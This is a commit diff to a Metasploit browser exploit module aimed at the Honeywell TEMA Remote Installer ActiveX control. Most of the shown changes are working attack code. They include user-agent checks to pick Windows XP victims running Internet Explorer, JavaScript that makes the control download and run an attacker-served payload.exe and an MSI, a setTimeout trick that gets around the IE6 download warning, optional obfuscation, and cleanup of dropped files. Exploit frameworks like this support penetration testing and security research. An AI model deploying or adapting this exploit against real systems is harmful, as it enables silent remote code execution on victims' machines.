improvements and testing

Author: jvazquez-r7

modules/exploits/windows/browser/honeywell_tema_exec.rb

@@ -22,7 +22,8 @@ def initialize(info={})
 				Installer.  This ActiveX control can be abused by using the DownloadFromURL()
 				function to install an arbitrary MSI from a remote location without checking source
 				authenticity or user notification. This module has been tested successfully with
-				the Remote Installer ActiveX installed with HoneyWell EBI R410.1 - TEMA 5.3.0.
+				the Remote Installer ActiveX installed with HoneyWell EBI R410.1 - TEMA 5.3.0 and
+				Internet Explorer 6, 7 and 8 on Windows XP SP3.
 			},
 			'License'        => MSF_LICENSE,
 			'Author'         =>
@@ -64,11 +65,6 @@ def initialize(info={})
 			], self.class)
 	end
 
-	def exploit
-		@msi_name = rand_text_alpha(5 + rand(5)) + ".msi"
-		super
-	end
-
 	def on_new_session(session)
 		if session.type == "meterpreter"
 			session.core.use("stdapi") unless session.ext.aliases.include?("stdapi")
@@ -100,7 +96,9 @@ def on_new_session(session)
 	def on_request_uri(cli, request)
 		agent = request.headers['User-Agent']
 
-		if agent !~ /MSIE \d/ and agent !~ /Tema_RemoteInstaller/
+		# Windows 7 isn't normally supported because the user won't have write access to the
+		# %WINDIR%/Temp directory, where the downloaded components are stored.
+		if not (agent =~ /MSIE \d/ and agent =~ /NT 5\.1/) and agent !~ /Tema_RemoteInstaller/
 			print_error("Browser not supported: #{agent.to_s}")
 			send_not_found(cli)
 			return
@@ -122,26 +120,36 @@ def on_request_uri(cli, request)
 			source = ::File.open(msi_source, "rb"){|fd| fd.read(fd.stat.size) }
 			print_status("Sending msi")
 			send_response(cli, source, {'Content-Type'=>'application/octet-stream'})
-			register_file_for_cleanup("#{@msi_name}") unless @dropped_files and @dropped_files.include?("#{@msi_name}")
+			register_file_for_cleanup("ThinClient_TemaKit.msi") unless @dropped_files and @dropped_files.include?("ThinClient_TemaKit.msi")
+			register_file_for_cleanup("ThinClient_TemaKit.log") unless @dropped_files and @dropped_files.include?("ThinClient_TemaKit.log")
 			return
 		end
 
-		# The 'setTimeout' trick allows to execute the installer even if the user doesn't click the popup
-		# warning when downloading the payload.
-		# <object id="obj" classid="clsid:E01DF79C-BE0C-4999-9B13-B5F7B2306E9B">
-		js = <<-EOS
-		var obj = new ActiveXObject('Tema_RemoteInstaller.RemoteInstaller');
-		setTimeout(function(){obj.DownloadFromURL('#{get_uri}/#{@msi_name}');},1000);
-		obj.DownloadFromURL('#{get_uri}/payload.exe');
-		EOS
-		js.gsub!(/\t\t/, "")
+		if agent =~ /MSIE 6/
+			# The 'setTimeout' trick allows to execute the installer on IE6 even if the user
+			# doesn't click the warning popup when downloading the payload.
+			# The ThinClient_TemaKit.msi installer name must be static.
+			# <object id="obj" classid="clsid:E01DF79C-BE0C-4999-9B13-B5F7B2306E9B">
+			js = <<-EOS
+			var obj = new ActiveXObject('Tema_RemoteInstaller.RemoteInstaller');
+			setTimeout("obj.DownloadFromURL('#{get_uri}/ThinClient_TemaKit.msi');", 1000);
+			obj.DownloadFromURL('#{get_uri}/payload.exe');
+			EOS
+		else
+			js = <<-EOS
+			var obj = new ActiveXObject('Tema_RemoteInstaller.RemoteInstaller');
+			obj.DownloadFromURL('#{get_uri}/payload.exe');
+			obj.DownloadFromURL('#{get_uri}/ThinClient_TemaKit.msi');
+			EOS
+		end
+
+		js.gsub!(/\t\t\t/, "")
 
 		if datastore['OBFUSCATE']
 			js = ::Rex::Exploitation::JSObfu.new(js)
 			js.obfuscate
 		end
 
-
 		html = <<-EOS
 		<html>
 		<body>